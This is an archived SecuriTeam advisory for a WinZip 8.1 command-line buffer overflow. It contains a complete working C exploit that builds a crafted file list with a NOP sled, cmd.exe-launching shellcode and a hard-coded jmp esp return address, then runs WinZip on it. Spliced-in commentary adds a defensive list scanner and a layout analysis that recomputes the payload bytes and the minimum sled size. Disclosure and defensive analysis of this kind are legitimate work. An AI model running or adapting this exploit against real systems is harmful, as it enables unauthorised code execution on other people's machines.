[EXPL] WinZip Local Buffer Overflow (Exploit)

From: SecuriTeam (support_at_securiteam.com)
Date: 06/09/05

    To: list@securiteam.com
    Date: 9 Jun 2005 11:44:41 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - - - - - - - -

      WinZip Local Buffer Overflow (Exploit)
    ------------------------------------------------------------------------

    SUMMARY

    WinZip (http://www.winzip.com/) is "The original and most popular of
    all Windows Zip file utilities."

    By running the WinZip command-line tool with the /zipandmail switch and a
    crafted file list (passed with /@), a local user can overflow a stack
    buffer in winzip32.exe and execute arbitrary code. The exploit below
    overwrites the saved return address, so the code runs with the privileges
    of the winzip32.exe process; this amounts to privilege elevation only when
    a more privileged user or process can be made to process an
    attacker-supplied file list.
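The check whose absence this advisory describes, as an added example (this is not WinZip code and not part of the original advisory): a reader for a one-path-per-line file list that rejects any entry that would not fit a fixed path buffer or that carries non-printable bytes, run against a constructed list shaped like the one the exploit below writes (an ordinary file name, then "c:\" followed by a 384-byte run of 0x90). The 259-character limit (MAX_PATH minus the terminator) is an assumption; WinZip's real buffer size is not given on this page.

```c
#include <stdio.h>
#include <string.h>

/* Assumed bound on one list-file entry. WinZip's real buffer size is not
 * documented on the page; MAX_PATH (260 bytes including the terminator) is
 * the assumption, so 259 characters is the longest entry accepted. */
#define MAX_ENTRY 259

struct list_stats {
    int entries;    /* non-empty lines seen */
    int overlong;   /* entries longer than MAX_ENTRY */
    int nonprint;   /* entries carrying bytes outside printable ASCII */
    int first_bad;  /* 1-based index of the first rejected entry, 0 if none */
};

/* 1 if the entry holds any byte outside 0x20..0x7E. A NOP sled or shellcode
 * never survives this check; a real Windows path always does. */
static int has_nonprintable(const unsigned char *s, size_t n)
{
    size_t i;
    for (i = 0; i < n; i++)
        if (s[i] < 0x20 || s[i] > 0x7E)
            return 1;
    return 0;
}

/* Bounded copy of one entry: the length check the vulnerable build lacks.
 * Returns 0 on success, -1 when the entry would overflow dst or is not a
 * printable path. Nothing is written to dst on failure. */
static int copy_entry_checked(char *dst, size_t cap, const unsigned char *line, size_t n)
{
    if (n >= cap || has_nonprintable(line, n))
        return -1;
    memcpy(dst, line, n);
    dst[n] = '\0';
    return 0;
}

/* Walk a one-path-per-line list (the format the exploit writes) and classify
 * every entry. CRLF line endings are tolerated, blank lines are skipped. */
static struct list_stats scan_list(const unsigned char *buf, size_t len)
{
    struct list_stats st = {0, 0, 0, 0};
    char entry[MAX_ENTRY + 1];
    size_t start = 0, i;

    for (i = 0; i <= len; i++) {
        size_t n;
        if (i < len && buf[i] != '\n')
            continue;
        n = i - start;
        if (n > 0 && buf[start + n - 1] == '\r')
            n--;
        if (n > 0) {
            st.entries++;
            if (n > MAX_ENTRY)
                st.overlong++;
            if (has_nonprintable(buf + start, n))
                st.nonprint++;
            if (copy_entry_checked(entry, sizeof entry, buf + start, n) != 0 && st.first_bad == 0)
                st.first_bad = st.entries;
        }
        start = i + 1;
    }
    return st;
}

/* Constructed sample shaped like the exploit's list file: one ordinary file
 * name, then "c:\" followed by a 384-byte NOP sled. The shellcode and return
 * address are left out; the sled alone already fails both checks. */
static size_t build_exploit_sample(unsigned char *out, size_t cap)
{
    static const char first[] = "C:\\someinputfile.ext\n";
    size_t p = 0, n1 = sizeof first - 1;
    if (cap < n1 + 3 + 384 + 1)
        return 0;
    memcpy(out, first, n1);            p += n1;
    memcpy(out + p, "c:\\", 3);        p += 3;
    memset(out + p, 0x90, 384);        p += 384;
    out[p++] = '\n';
    return p;
}

static struct list_stats scan_exploit_sample(void)
{
    unsigned char buf[512];
    size_t len = build_exploit_sample(buf, sizeof buf);
    return scan_list(buf, len);
}

/* Constructed benign list with CRLF endings, for comparison. */
static struct list_stats scan_benign_sample(void)
{
    static const char list[] = "C:\\docs\\report.doc\r\nC:\\docs\\budget.xls\r\n";
    return scan_list((const unsigned char *)list, sizeof list - 1);
}

int main(void)
{
    struct list_stats a = scan_exploit_sample(), b = scan_benign_sample();
    printf("exploit-shaped list: %d entries, %d overlong, %d non-printable, first rejected #%d\n",
           a.entries, a.overlong, a.nonprint, a.first_bad);
    printf("benign list:         %d entries, %d overlong, %d non-printable, first rejected #%d\n",
           b.entries, b.overlong, b.nonprint, b.first_bad);
    return 0;
}
```

The same scan doubles as a triage check for a list file recovered from disk: a genuine WinZip file list never holds runs of 0x90 or an entry hundreds of bytes long, so either finding on a .tmp passed with /@ is worth a closer look.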

    DETAILS

    Vulnerable Systems:
     * WinZip version 8.1

    Immune Systems:
     * WinZip version 9.0 SR-1 (download: http://www.winzip.com/wz90sr1.htm)

    Exploit:
    /*
    *
    * WinZip Command Line Local Buffer Overflow
    * http://securitytracker.com/alerts/2004/Sep/1011132.html
    * http://www.winzip.com/wz90sr1.htm
    * Exploit coded By ATmaCA
    * Web: atmacasoft.com && spyinstructors.com
    * E-Mail: atmaca at icqmail
    * Credit to kozan
    *
    */

    /*
    *
    * Tested with WinZip 8.1 on Win XP Sp2 En
    * Bug Fixed on WinZip 9.0 Service Release 1 (SR-1)
    * http://www.winzip.com/wz90sr1.htm
    *
    */

    #include <windows.h>
    #include <stdio.h>
    #include <string.h>

    #define NOP 0x90

    int main(void)
    {
            // crafted file list handed to WinZip with /@, and the command line that runs it
            char tmpfile[] = "c:\\wzs45.tmp";
            char winzippath[] = "C:\\Program Files\\WINZIP\\winzip32.exe";
            char zipandmailpar[] = " -* /zipandmail /@ ";
            char runpar[300];

            // first line of the list: some input file name; it does not have to exist
            char inputfile[] = "C:\\someinputfile.ext\n";

            // launches a local cmd.exe. Disassembly:
            //   push ebp / mov ebp,esp / xor edi,edi / push edi    (NUL terminator on the stack)
            //   sub esp,4 / mov byte [ebp-8]..[ebp-2], "cmd.exe"   (string built in place)
            //   mov eax,77C293C7h / push eax                        (system() - WinXP SP2 - msvcrt.dll)
            //   lea eax,[ebp-8] / push eax / call [ebp-0Ch]         (system("cmd.exe"))
            char shellcode[] =
            "\x55\x8B\xEC\x33\xFF"
            "\x57\x83\xEC\x04\xC6\x45\xF8"
            "\x63\xC6\x45\xF9\x6D\xC6\x45"
            "\xFA\x64\xC6\x45\xFB\x2E\xC6"
            "\x45\xFC\x65\xC6\x45\xFD\x78"
            "\xC6\x45\xFE\x65\xB8"
            "\xC7\x93\xC2\x77" //77C293C7 system() - WinXP SP2 - msvcrt.dll
            "\x50\x8D\x45\xF8\x50"
            "\xFF\x55\xF4";

            FILE *di;
            int i;

            strcpy(runpar, winzippath);
            strcat(runpar, zipandmailpar);
            strcat(runpar, tmpfile);

            // create the crafted .tmp file
            if ((di = fopen(tmpfile, "wb")) == NULL)
                    return 1;

            for (i = 0; i < (int)sizeof(inputfile) - 1; i++)
                    fputc(inputfile[i], di);

            // second line: an over-long path that overruns the stack buffer
            fputs("c:\\", di);

            for (i = 0; i < 384; i++)               // NOP sled
                    fputc(NOP, di);

            for (i = 0; i < (int)sizeof(shellcode) - 1; i++)
                    fputc(shellcode[i], di);

            fputs("\xBF\xAC\xDA\x77", di); // saved EIP -> 0x77DAACBF, jmp esp (WinXp Sp2 Eng)
            fputs("\x90\x90\x90\x90", di); // NOPs: esp points here right after the ret
            fputs("\x90\x83\xEC\x74", di); // nop; sub esp,0x74: esp moves 116 bytes back into the sled
            fputs("\xFF\xE4\x90\x90", di); // jmp esp: slides down the NOPs into the shellcode

            fputs("\n", di);

            fclose(di);
            WinExec(runpar, SW_SHOW);
            return 0;
    }
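The exploit's stack layout is worth checking arithmetically before relying on it. The following added example (not part of ATmaCA's exploit) assembles the same over-long line in memory and models the trampoline: after the overwritten return address executes jmp esp, esp points at the four NOPs, sub esp,0x74 moves it 116 bytes back into the NOP sled, and the second jmp esp slides into the shellcode. It also derives the smallest sled for which that still works, which the original's 384 NOPs comfortably exceed. The bytes and addresses are copied from the exploit above; the landing arithmetic assumes the ret pops exactly the four address bytes and that nothing else is pushed before the trampoline runs, which is how the original's sub esp,0x74 was evidently sized.

```c
#include <stdio.h>
#include <string.h>

/* Bytes copied from the exploit above: the system("cmd.exe") shellcode, the
 * saved-EIP overwrite (jmp esp in WinXP SP2 En) and the 12-byte trampoline. */
static const unsigned char SHELLCODE[] = {
    0x55, 0x8B, 0xEC, 0x33, 0xFF, 0x57, 0x83, 0xEC, 0x04, 0xC6, 0x45, 0xF8,
    0x63, 0xC6, 0x45, 0xF9, 0x6D, 0xC6, 0x45, 0xFA, 0x64, 0xC6, 0x45, 0xFB,
    0x2E, 0xC6, 0x45, 0xFC, 0x65, 0xC6, 0x45, 0xFD, 0x78, 0xC6, 0x45, 0xFE,
    0x65, 0xB8, 0xC7, 0x93, 0xC2, 0x77, 0x50, 0x8D, 0x45, 0xF8, 0x50, 0xFF,
    0x55, 0xF4
};
static const unsigned char RET_JMP_ESP[4] = { 0xBF, 0xAC, 0xDA, 0x77 }; /* 0x77DAACBF */
static const unsigned char TRAMPOLINE[12] = {
    0x90, 0x90, 0x90, 0x90,   /* esp points here right after the ret */
    0x90, 0x83, 0xEC, 0x74,   /* nop; sub esp,0x74 */
    0xFF, 0xE4, 0x90, 0x90    /* jmp esp; nop; nop */
};
#define SUB_ESP_DELTA 0x74
#define PREFIX "c:\\"

struct layout { size_t sled_off, shellcode_off, ret_off, total; };

/* Assemble the over-long second line: "c:\" + nops NOPs + shellcode +
 * return address + trampoline. Returns the length, or 0 if it does not fit. */
static size_t build_line(unsigned char *out, size_t cap, size_t nops, struct layout *lo)
{
    size_t p = 0;
    if (cap < sizeof PREFIX - 1 + nops + sizeof SHELLCODE + sizeof RET_JMP_ESP + sizeof TRAMPOLINE)
        return 0;
    memcpy(out + p, PREFIX, sizeof PREFIX - 1);          p += sizeof PREFIX - 1;
    lo->sled_off = p;
    memset(out + p, 0x90, nops);                         p += nops;
    lo->shellcode_off = p;
    memcpy(out + p, SHELLCODE, sizeof SHELLCODE);        p += sizeof SHELLCODE;
    lo->ret_off = p;
    memcpy(out + p, RET_JMP_ESP, sizeof RET_JMP_ESP);    p += sizeof RET_JMP_ESP;
    memcpy(out + p, TRAMPOLINE, sizeof TRAMPOLINE);      p += sizeof TRAMPOLINE;
    lo->total = p;
    return p;
}

/* Control flow after the overflow: the ret pops the 4 address bytes, so esp
 * = ret_off + 4 (the trampoline); "sub esp,0x74" moves it back 116 bytes and
 * "jmp esp" resumes there. Returns that offset within the line; it goes
 * negative when the sled is far too short. */
static long trampoline_landing(const struct layout *lo)
{
    return (long)lo->ret_off + (long)sizeof RET_JMP_ESP - SUB_ESP_DELTA;
}

/* 1 if execution resumes on a NOP inside the sled (and so slides into the
 * shellcode), 0 if it lands before the sled or on a non-NOP byte. */
static int landing_in_sled(const unsigned char *buf, const struct layout *lo)
{
    long l = trampoline_landing(lo);
    return l >= (long)lo->sled_off && l < (long)lo->shellcode_off && buf[l] == 0x90;
}

/* Smallest sled for which the trampoline still lands on a NOP. */
static size_t min_sled_nops(void)
{
    return SUB_ESP_DELTA - sizeof RET_JMP_ESP - sizeof SHELLCODE;
}

static unsigned char g_line[1024];

static long landing_for(size_t nops)
{
    struct layout lo;
    return build_line(g_line, sizeof g_line, nops, &lo) ? trampoline_landing(&lo) : -1;
}

static int hits_sled(size_t nops)
{
    struct layout lo;
    return build_line(g_line, sizeof g_line, nops, &lo) ? landing_in_sled(g_line, &lo) : 0;
}

int main(void)
{
    size_t n[] = { 384, 62, 61 };   /* the original sled, the minimum, one short */
    size_t i;
    for (i = 0; i < sizeof n / sizeof n[0]; i++) {
        struct layout lo;
        size_t len = build_line(g_line, sizeof g_line, n[i], &lo);
        printf("sled %3zu: line %3zu bytes, sled@%zu shellcode@%zu ret@%zu, landing %ld -> %s\n",
               n[i], len, lo.sled_off, lo.shellcode_off, lo.ret_off, trampoline_landing(&lo),
               landing_in_sled(g_line, &lo) ? "slides into shellcode" : "misses the sled");
    }
    printf("minimum sled: %zu NOPs\n", min_sled_nops());
    return 0;
}
```

With the original 384-byte sled the second jmp esp lands 62 bytes before the shellcode, well inside the NOPs; trim the sled below 62 bytes and it lands on "c:\" and the exploit fails. Note that the hard-coded 0x77DAACBF and 0x77C293C7 are only valid for the English Windows XP SP2 msvcrt.dll and kernel32.dll builds the exploit was tested on, so the layout check says nothing about portability to other service packs.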

    ADDITIONAL INFORMATION

    The information has been provided by ATmaCA (atmaca@icqmail.com).
    The original article can be found at:
    http://securitytracker.com/alerts/2004/Sep/1011132.html

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.


